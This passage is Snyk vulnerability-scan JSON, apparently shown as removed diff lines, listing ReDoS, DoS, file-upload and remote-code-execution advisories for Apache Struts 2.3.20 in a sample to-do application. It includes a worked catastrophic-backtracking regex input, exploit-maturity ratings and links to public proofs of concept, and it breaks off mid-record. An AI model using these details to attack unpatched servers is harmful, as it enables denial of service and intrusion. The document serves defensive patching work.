"org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.29" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-460223", - "title": "Regular Expression Denial of Service (ReDoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.3.20, 2.3.29)", - "[2.5,2.5.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - 
"2.3.29", - "2.5.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:51.243501Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:37.316157Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:51.243501Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The URLValidator class allows remote attackers to cause a denial of service via a null value for a URL field.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. 
There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). 
The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. 
These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29, 2.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152)\n- [GitHub Commit](https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465)\n", - "epssDetails": { - "percentile": "0.99401", - "probability": "0.95900", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4465" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2019-08-23T13:23:19.812650Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-20T07:45:43Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-06-20T07:45:43Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:51.243501Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.29" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-5707101", - "title": "Allocation of Resources Without Limits or 
Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", - "credit": [ - "Matthew McClain" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.5.31)", - "[6.1.2,6.1.2.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.5.31", - "6.1.2.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/2d6f1bc0a6f5ac575a56784ac6461816b67c4f21", - "title": "GitHub Commit" - }, - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-063", - "title": "Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:48:27.696682Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:06:22.161472Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:27.696682Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to improper handling of `getProperty()` by the `XWorkListPropertyAccessor` class.\r\nExploiting this vulnerability is possible if the developer has set `CreateIfNull` to true for the underlying Collection type 
field.\r\n\r\n## Workaround\r\n\r\nSet `CreateIfNull` to false for Collection type fields (it is false by default if not set).\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.31, 6.1.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/2d6f1bc0a6f5ac575a56784ac6461816b67c4f21)\n- [Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-063)\n", - "epssDetails": { - "percentile": "0.86905", - "probability": "0.01484", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-34149" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2023-06-14T10:02:40.213361Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-06-14T09:51:03Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2023-06-14T10:55:13.206157Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:27.696682Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.5.31" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-608097", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C", - "credit": [ - "Matthias Kaiser" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.5.22)" - ] - }, - "exploit": "Functional", - "fixedIn": [ - 
"2.5.22" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://www.exploit-db.com/exploits/49068", - "title": "Exploit" - }, - { - "url": "https://github.com/PrinceFPF/CVE-2019-0230", - "title": "Proof Of Concept" - }, - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-059", - "title": "Security Bulletin" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2019/CVE-2019-0230.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:13.645371Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:03.579407Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:00:34.752855Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:13.645371Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:03.579407Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source 
framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). Forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.22 or higher.\n## References\n- [Exploit](https://www.exploit-db.com/exploits/49068)\n- [Proof Of Concept](https://github.com/PrinceFPF/CVE-2019-0230)\n- [Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-059)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2019/CVE-2019-0230.yaml)\n", - "epssDetails": { - "percentile": "0.99361", - "probability": "0.95346", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-0230" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2020-08-21T14:31:35.397242Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-08-11T14:14:01Z", - "exploitDetails": { - "sources": [ - "ExploitDB", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Functional", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2020-08-21T14:06:54Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:22.021057Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.5.22" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": 
"2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-608098", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", - "credit": [ - "Takeshi Terada of Mitsui Bussan Secure Directions", - "Inc" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.5.22)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.5.22" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-060", - "title": "Security Bulletin" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:16.027732Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:03.532706Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:13.403682Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:16.027732Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:03.532706Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) 
is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When a file upload is performed to an `Action` that exposes the file with a getter, an attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container's temp directory to read-only, such that subsequent upload actions will fail.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.22 or higher.\n## References\n- [Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-060)\n", - "epssDetails": { - "percentile": "0.95581", - "probability": "0.13147", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-0233" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2020-08-21T14:39:32.053413Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-08-11T14:36:56Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2020-08-21T14:36:29Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:03.532706Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.5.22" - ], - "isUpgradable": true, - "isPatchable": false, - "name": 
"org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-609765", - "title": "Unrestricted Upload of File with Dangerous Type", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.5)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://issues.apache.org/jira/browse/WW-5055", - "title": "Bug Report" - }, - { - "url": "https://github.com/apache/struts/commit/4271682d2b944e9022e4e4c499df43e0ce7e58fd", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:45:53.807283Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:00:42.248460Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:45:53.807283Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Unrestricted Upload of File with Dangerous Type. 
A local code execution issue exists in Apache Struts2 when processing malformed XSLT files, which could let a malicious user upload and execute arbitrary files.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5 or higher.\n## References\n- [Bug Report](https://issues.apache.org/jira/browse/WW-5055)\n- [GitHub Commit](https://github.com/apache/struts/commit/4271682d2b944e9022e4e4c499df43e0ce7e58fd)\n", - "epssDetails": { - "percentile": "0.60025", - "probability": "0.00216", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2012-1592" - ], - "CWE": [ - "CWE-434" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2020-09-04T15:56:51.451242Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2019-12-05T15:43:54Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2020-09-04T15:56:53Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:45:53.807283Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.5" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-6100744", - "title": "Denial of Service", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Matthew McClain" - ], - "semver": { - "vulnerable": [ - "[,2.5.32)", - "[6.0.0,6.1.2.2)", - "[6.2.0,6.3.0.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": 
[ - "2.5.32", - "6.1.2.2", - "6.3.0.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/3292152f8c0a77ee4827beede82b6580478a2c2a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/bf54436869c264941dd192c752a4abfaa65d3711", - "title": "GitHub Commit" - }, - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-065", - "title": "Struts Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:54:08.762991Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:54:10.404666Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:27.113057Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:08.762991Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:10.404666Z" - } - ], - "description": "## 
Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service when certain fields exceed the `maxStringLength` limit during multipart requests. An attacker can exploit this to leave uploaded files in the `struts.multipart.saveDir` even after the request has been denied resulting in excessive disk usage.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.32, 6.1.2.2, 6.3.0.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/3292152f8c0a77ee4827beede82b6580478a2c2a)\n- [GitHub Commit](https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7)\n- [GitHub Commit](https://github.com/apache/struts/commit/bf54436869c264941dd192c752a4abfaa65d3711)\n- [Struts Issue](https://cwiki.apache.org/confluence/display/WW/S2-065)\n", - "epssDetails": { - "percentile": "0.66400", - "probability": "0.00264", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-41835" - ], - "CWE": [ - "CWE-400" - ], - "GHSA": [ - "GHSA-729q-fcgp-r5xh" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2023-12-06T07:04:16.630936Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-12-05T09:33:27Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2023-12-06T08:01:07.098280Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:10.404666Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - 
"from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.5.32" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-6102825", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "Steven Seeley" - ], - "semver": { - "vulnerable": [ - "[,2.5.33)", - "[6.0.0,6.3.0.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.5.33", - "6.3.0.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://lists.apache.org/thread/yh09b3fkf6vz5d6jdgrlvmg60lfwtqhj", - "title": "Apache Mailing List" - }, - { - "url": "https://www.akamai.com/blog/security-research/apache-struts-cve-exploitation-attempts", - "title": "Exploitation Attempts" - }, - { - "url": "https://github.com/apache/struts/commit/162e29fee9136f4bfd9b2376da2cbf590f9ea163", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/d8c69691ef1d15e76a5f4fcf33039316da2340b6", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/wy876/POC/blob/main/Apache%20Struts2%20CVE-2023-50164.md", - "title": "PoC" - }, - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-066", - "title": "Struts Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:54:10.322561Z" - }, - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 
